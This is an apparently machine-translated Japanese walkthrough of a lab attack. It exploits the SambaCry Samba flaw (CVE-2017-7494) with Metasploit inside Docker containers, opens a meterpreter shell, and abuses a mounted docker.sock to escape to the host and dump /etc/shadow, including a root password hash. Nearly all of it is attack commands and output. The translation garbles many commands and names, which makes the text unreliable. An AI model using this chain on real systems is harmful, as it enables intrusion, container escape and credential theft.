ホスト上のDockerコンテナ内でシェルまたはプログラムを実行する

docker run --rm -it \
    --name 脆弱な \
    --network-pwnage \
    -v '/var/run/docker.sock:/var/run/docker.sock' \
    脆弱性/CVE-2017-7494

docker run --rm -it \
    --network-pwnage \
    -v '/usr/bin/docker:/docker:ro' \
    strm/メタスプロイト

msf5 > ping -c 2 脆弱 
[*] exec: ping -c 2 脆弱 
 
PING脆弱（172.20.0.2）56（84）バイトのデータ。
脆弱性のあるpwnage (172.20.0.2) からの 64 バイト: icmp_seq=1 ttl=64 time=0.120 ms
脆弱性のある.pwnage (172.20.0.2) からの 64 バイト: icmp_seq=2 ttl=64 time=0.097 ms
 
--- 脆弱な ping 統計 ---
送信パケット 2 個、受信パケット 2 個、パケット損失 0%、時間 1009 ミリ秒
rtt 最小/平均/最大/平均偏差 = 0.097/0.108/0.120/0.015 ミリ秒

補助/スキャナ/smb/smb_enumshares を使用する
rhosts を脆弱に設定する
走る

msf5 > 補助/スキャナ/smb/smb_enumshares を使用する
msf5 補助(スキャナ/smb/smb_enumshares) > rhosts を脆弱に設定
rhosts => 脆弱
msf5 補助(スキャナ/smb/smb_enumshares) > 実行
 
[+] 172.20.0.2:139 - データ - (DS) データ
[+] 172.20.0.2:139 - IPC$ - (I) IPC サービス (泣きサンバ)
[*] 脆弱: - 1 台のホストのうち 1 台をスキャンしました (100% 完了)
[*] 補助モジュールの実行が完了しました

エクスプロイト/linux/samba/is_known_pipename を使用する
RHOSTを脆弱に設定する
RPORT 445 を設定
ペイロードを設定する linux/x64/meterpreter/bind_tcp
ターゲット3を設定
SMB_FOLDERデータを設定する
SMBUser sambacry を設定する
SMBPassを設定する nosambanocry
悪用する

msf5 > エクスプロイト/linux/samba/is_known_pipename を使用する
msf5 エクスプロイト(linux/samba/is_known_pipename) > RHOST を脆弱に設定する
RHOST => 脆弱
msf5 エクスプロイト(linux/samba/is_known_pipename) > RPORT 445 を設定
レポート => 445
msf5 エクスプロイト (linux/samba/is_known_pipename) > ペイロードを設定 linux/x64/meterpreter/bind_tcp
ペイロード => linux/x64/meterpreter/bind_tcp
msf5 エクスプロイト(linux/samba/is_known_pipename) > TARGET 3 を設定
ターゲット => 3
msf5 エクスプロイト(linux/samba/is_known_pipename) > SMB_FOLDER データの設定
SMB_FOLDER => データ
msf5 エクスプロイト(linux/samba/is_known_pipename) > SMBUser sambacry を設定する
SMBUser => サンバクリ
msf5 エクスプロイト(linux/samba/is_known_pipename) > SMBPass nosambanocry を設定する
SMBPass => いやだー
msf5 エクスプロイト(linux/samba/is_known_pipename) > エクスプロイト
 
[*] 脆弱:445 - パスに場所 \\vulnerable\data\ を使用する
[*] 脆弱性:445 - 共有「データ」のリモートパスの取得
[*] 脆弱:445 - 共有「data」にサーバー側パス「/data」がある
[*] 脆弱:445 - ペイロードを \\vulnerable\data\shyyEPPk.so にアップロードしました
[*] 脆弱性:445 - \\PIPE\/data/shyyEPPk.so を使用してサーバー側パス /data/shyyEPPk.so からペイロードをロードします...
[-] 脆弱:445 - >> STATUS_OBJECT_NAME_NOT_FOUND の読み込みに失敗しました
[*] 脆弱:445 - /data/shyyEPPk.so を使用してサーバー側パス /data/shyyEPPk.so からペイロードをロードします...
[-] 脆弱:445 - >> STATUS_OBJECT_NAME_NOT_FOUND の読み込みに失敗しました
[*] 脆弱な 4444 に対するバインド TCP ハンドラーを開始しました
[*] 脆弱な送信ステージ（816260バイト）
 
メータープレター >

アップロード /docker /docker
/usr/lib/x86_64-linux-gnu/libltdl.so.7 をアップロードします /usr/lib/x86_64-linux-gnu/libltdl.so.7
chmod 777 /docker
chmod +x /docker
メータープレター > アップロード /docker /docker
[*] アップロード中: /docker -> /docker
[*] アップロード済み -1.00 B / 36.36 MiB (0.0%): /docker -> /docker
[*] アップロード済み -1.00 B / 36.36 MiB (0.0%): /docker -> /docker
[*] アップロード済み -1.00 B / 36.36 MiB (0.0%): /docker -> /docker
[*] アップロード済み -1.00 B / 36.36 MiB (0.0%): /docker -> /docker
[*] アップロード済み -1.00 B / 36.36 MiB (0.0%): /docker -> /docker
[*] アップロード済み : /docker -> /docker
メータープリター > /usr/lib/x86_64-linux-gnu/libltdl.so.7 をアップロード /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] アップロード中: /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] 38.47 KiB のうち -1.00 B (-0.0%) をアップロードしました: /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] アップロードしました: /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
メータープレター > chmod 777 /docker
メータープリター > chmod +x /docker
メータープレター >

メータープリター > 実行 -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"
プロセス 113 が作成されました。
チャンネル13が作成されました。
ルート:$1$UFKdtFGw$qp29y1qGWit/vnvIG0uSr1:17488:0:99999:7:::
デーモン:*:17488:0:99999:7:::
ビン:*:17488:0:99999:7:::
sys:*:17488:0:99999:7:::
同期:*:17488:0:99999:7:::
ゲーム:*:17488:0:99999:7:::
男:*:17488:0:99999:7:::
lp:*:17488:0:99999:7:::
メール:*:17488:0:99999:7:::
ニュース:*:17488:0:99999:7:::